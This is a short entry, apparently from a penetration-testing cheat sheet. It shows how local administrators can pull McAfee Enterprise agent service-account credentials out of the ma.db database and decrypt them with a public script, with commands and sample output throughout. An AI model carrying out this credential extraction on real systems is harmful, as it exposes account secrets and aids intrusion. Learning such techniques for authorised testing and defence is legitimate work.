McAfee Credentials
McAfee Enterprise stores in C:\ProgramData\McAfee\Agent\DB\ma.db the credentials used by the agent to connect back to the orchestrator.
With a local administrator access, we can read it and extract the service account username and password.
$ sqlitebrowser ma.db
Look inside the AGENT_REPOSITORIES table.
We can decrypt it using mcafee-sitelist-pwd-decryption (0.1k β):
$ wget "https://raw.githubusercontent.com/funoverip/mcafee-sitelist-pwd-decryption/master/mcafee_sitelist_pwd_decrypt.py"
$ python -m venv venv && source venv/bin/activate
$ pip3 install pycryptodome
$ python mcafee_sitelist_pwd_decrypt.py "jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q=="
Crypted password : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
Decrypted password : MyStrongPassword!